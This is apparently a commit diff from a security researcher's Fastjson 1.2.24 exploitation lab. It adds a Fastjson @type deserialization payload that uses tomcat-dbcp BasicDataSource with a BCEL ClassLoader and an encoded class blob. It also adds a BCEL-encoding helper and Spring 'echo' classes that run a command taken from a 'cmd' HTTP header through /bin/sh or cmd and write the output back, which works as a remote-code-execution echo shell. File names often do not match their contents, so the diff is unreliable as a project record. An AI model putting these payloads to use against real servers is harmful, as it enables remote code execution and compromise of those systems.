Fastjson

Author: SummerSec

1.txt

@@ -0,0 +1 @@
+1 

2.txt

@@ -0,0 +1 @@
+1 

RMI JRMP JNDI/.idea/compiler.xml

@@ -50,6 +50,11 @@
             <artifactId>fastjson</artifactId>
             <version>1.2.24</version>
         </dependency>
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-dbcp</artifactId>
+            <version>9.0.8</version>
+        </dependency>
     </dependencies>
 
     <build>

RMI JRMP JNDI/.idea/uiDesigner.xml

@@ -30,9 +30,7 @@ public String fastjsonvul(){
     @ResponseBody
     public String vuldemo(@RequestBody String  request){
         System.out.println(request);
-        String result = request.substring(9,request.length());
-        System.out.println(URLDecoder.decode(result));
-        JSON.parse(URLDecoder.decode(result));
+        JSON.parseObject(request);
         return "parse is ok!";
     }
 
@@ -64,7 +62,19 @@ public static void main(String[] args) {
                 "  },\n" +
                 "  \"string\": \"welcome to json\"\n" +
                 "}";
-        Object ob = JSON.parse(json2);
+        String json3 = "{\n" +
+                "    {\n" +
+                "        \"@type\": \"com.alibaba.fastjson.JSONObject\",\n" +
+                "        \"x\":{\n" +
+                "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
+                "                \"driverClassLoader\": {\n" +
+                "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
+                "                },\n" +
+                "                \"driverClassName\": \"$l$8b$I$A$A$A$A$A$A$A$bdU$d1n$da0$U$7dG$e2$l$ac$3c$F$c4$i$60Z$l$8a$s$N$95J$ad$b4$b5S$e9$d6$87$b6$P$c6$5c$m$adc$a7$b6$DTS$ff$7d$d7q$d2B$m$T$ea$a6$f9$85$d8$3e$f7$dc$e3s$afM$ca$f8$p$9b$D1Y$92$806$c0$v$f0$85$a2$tJZ$ad$84$A$3dh6$9a$8d8I$95$b6$e4$81$z$Z$VL$ce$a9$86$99$An$e97$b0$L5$jl$p2$h$L$3a$e6L$ca$o$3cj$b7$9b$N$d2$s_N$E3$e6$82$rpL$c6$a9$8e$e5$fc$U$93$f5$fc$de$I$M$d7qjc$r$8f$c9$f5$e5$e8$d2$_$P3$cc$a0$R$9f$L$y$a0$cc$oC$bf$db$efEGQ$ff$88$f4$8e$8e$bb$9f$fc$d6O$3cD$ce$b0$ec$d1$$$ed$eeR$bb$95v$d4l$a4$d9D$c4$9cp$a7hS$M$f9$85$I$i$c62$8b$fb$c5$cc$N$ab$9f7$a7n$e4$e7$n$9c$7c$s$d7$L$NlJy$a65H$ebga$8b$ce$c1$3a$xams$e8W$c5$a6$a0q$5d$e0G$be$S$GJ$cf$a9$c9$f3$cf4$3a$b3R$fa$91$ae$60B$b9$8fC$ab$9f20$96$5e$f9$df$82$eeL$Jd$KZ$83mA$be$k$qAE$dc$r$f7$f30$c0$cf$o$7eh$ad$8e$t$99$F$b3$T$7c9y$c0$9a$S$85$c1$J$8d$e5R$3dB$u3$n$aa$b8$ffs$de1$e8$a58D$f6$fe$c3$9aTI$D$b5$G$f5$ea$j$aa$f3E$p$e7$a65$aa$W$f7$e4$60$bd$N$i$89$orfm$ba$7d$a6$bd$caP$c7$8d$8e$z$e8$bf2$d9$dd$c355$3e$dd$9b$95$a5$v$8eb$E$d8$fb$g$a6$h$G$f8$c4u$9e$n$e0$M$5c$aa$7f$a8l$81$a6$d0$5dgj$Vz$BAgl$5d$D$d1$fc$f6V$e5$be$c20$8b$jr$O$c6$c4$T$B$a1$d5$Z$ec$c1$faC$l$80$z$ca$bb$w$ab$f3$W$5b$U$da5H5$c8$L$r$3c$99bD$e8g$ad7$85$af$91O$j$S$mh$c7$7b$lq$7bO$b8J$S$s$a7$Gi$q$ac$ca$f5$8f$f7$V$7c$3c$c3$y$cf$c6B$e2$i$fc$aeU$K$da$3e$e3$ad3T$e2mCc$ad$fa$91$e2$e2$J3$80$95q$b7$8e$c5$S$Lss$7e$R$b4Z$d5$X$ce$8d2$f5m$f7$k$b3$e72$H$7f$40$f5rT$c4$ab$a0$X$C$c2$c0$B$J$a2I$y$p$b38$m$c9$87$dd$q$95$a7$aa$c4$f7$j$k$95W$e0$be$98y$df$e6$ed$b9$b7$ef$dcce$85$M$3ad$ab$ed$ca$e2y$8e$8e$_$8b$ff$d7$L$af2i$e3$E$i$5b$f1$89$d4$b0$G$k$96$8a$f2L$e72$cd$y$92$CK$c2V$8bf$GF$m$e2$c4$f1$85$c1$dd$dd$Q$cb$r$f12$e1$de$7bt$cfD$86$$Vt$be$8b$89$L$95$3f$h$b5L$_$843$cb$X$q$3c$5ds$c8$ffh$J$e4$bd$b4$B$v$t$f8$f1$f2$h$m$be$DOw$I$A$A\"\n" +
+                "        }\n" +
+                "    }: \"x\"\n" +
+                "}\n";
+        Object ob = JSON.parse(json3);
         System.out.println(ob.getClass().getName());
     }
 

RMI JRMP JNDI/.idea/vcs.xml

@@ -0,0 +1,17 @@
+package summersec.echo.Controller;
+
+import summersec.echo.Util.BCELEncode;
+
+/**
+ * @ClassName: Mcat
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/6/26 16:06
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class Mcat {
+    public static void main(String[] args) throws Exception {
+        System.out.println("$$BCEL$$" + BCELEncode.class2BCEL(System.getProperty("user.dir")+"\\target\\classes\\\\summersec\\echo\\Controller\\dfs_classloader.class"));
+    }
+}

Rce_Echo/TomcatEcho/pom.xml

@@ -6,6 +6,8 @@
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.ResponseBody;
 import java.io.*;
+import java.lang.reflect.Method;
+import java.util.Scanner;
 
 /**
  * @ClassName: SpringMVCTestController
@@ -17,20 +19,35 @@
  **/
 @Controller
 class SpringEcho {
-    @ResponseBody
-    @RequestMapping(value="/echo", method = RequestMethod.GET)
-    public SpringEcho Test() throws IOException {
 
-        org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
-        javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
-        javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
-
-        String cmd = httprequest.getHeader("cmd");
-        if(cmd != null && !cmd.isEmpty()){
-            String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
-            httpresponse.getWriter().println(res);
+    @RequestMapping(value = "springecho")
+    public void SpringEcho2()throws Exception{
+        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
+        Method m = c.getMethod("getRequestAttributes");
+        Object o = m.invoke(null);
+        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
+        m = c.getMethod("getResponse");
+        Method m1 = c.getMethod("getRequest");
+        Object resp = m.invoke(o);
+        Object req = m1.invoke(o); // HttpServletRequest
+        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
+        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
+        getHeader.setAccessible(true);
+        getWriter.setAccessible(true);
+        Object writer = getWriter.invoke(resp);
+        String cmd = (String)getHeader.invoke(req, "cmd");
+        String[] commands = new String[3];
+        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
+            commands[0] = "cmd";
+            commands[1] = "/c";
+        } else {
+            commands[0] = "/bin/sh";
+            commands[1] = "-c";
         }
-
-        return new SpringEcho();
+        commands[2] = cmd;
+        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
+        writer.getClass().getDeclaredMethod("flush").invoke(writer);
+        writer.getClass().getDeclaredMethod("close").invoke(writer);
     }
 }

Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/Fastjson.java

@@ -0,0 +1,49 @@
+package summersec.echo.Controller;
+
+import java.lang.reflect.Method;
+import java.util.Scanner;
+
+/**
+ * @ClassName: SpringEcho1
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/6/26 16:05
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class SpringEcho1 {
+    static {
+        try {
+            Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
+            Method m = c.getMethod("getRequestAttributes");
+            Object o = m.invoke(null);
+            c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
+            m = c.getMethod("getResponse");
+            Method m1 = c.getMethod("getRequest");
+            Object resp = m.invoke(o);
+            Object req = m1.invoke(o); // HttpServletRequest
+            Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
+            Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
+            getHeader.setAccessible(true);
+            getWriter.setAccessible(true);
+            Object writer = getWriter.invoke(resp);
+            String cmd = (String)getHeader.invoke(req, "cmd");
+            String[] commands = new String[3];
+            String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+            if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
+                commands[0] = "cmd";
+                commands[1] = "/c";
+            } else {
+                commands[0] = "/bin/sh";
+                commands[1] = "-c";
+            }
+            commands[2] = cmd;
+            writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
+            writer.getClass().getDeclaredMethod("flush").invoke(writer);
+            writer.getClass().getDeclaredMethod("close").invoke(writer);
+        } catch (Exception e) {
+
+        }
+
+    }
+}